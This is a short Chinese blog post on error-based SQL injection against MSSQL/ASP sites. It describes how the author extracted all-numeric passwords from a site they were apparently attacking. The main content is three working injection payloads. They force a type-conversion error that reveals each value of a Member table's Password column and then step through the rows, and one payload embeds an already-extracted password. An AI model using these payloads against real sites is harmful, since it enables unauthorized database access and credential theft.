MSSQL显错注入爆数字型数据的一点思考
浏览数:69 /
时间:2015年06月12日
Title:MSSQL显错注入爆数字型数据的一点思考 --2011-02-22 15:23
MSSQL+ASP
最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像"11111111"的这样的数据的,就自己想了下弄了个暂时可以用的方法.
数据库查询如图:
图一:
图二:
图三:
图四:
图五:
下面是实验
表Member 字段Password
语句
‘ or 1=convert(int,(select top 1 password from Member))--
语句‘ or 1=convert(int,(select top 1 password from member)+‘a‘)--
然后查询下一条数据
语句‘ or 1=convert(int,(select top 1 password from member where password not in (‘117517450‘))+‘a‘)--
不知道其他人是怎么爆的,可以告诉我的话,留个言,谢谢。
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
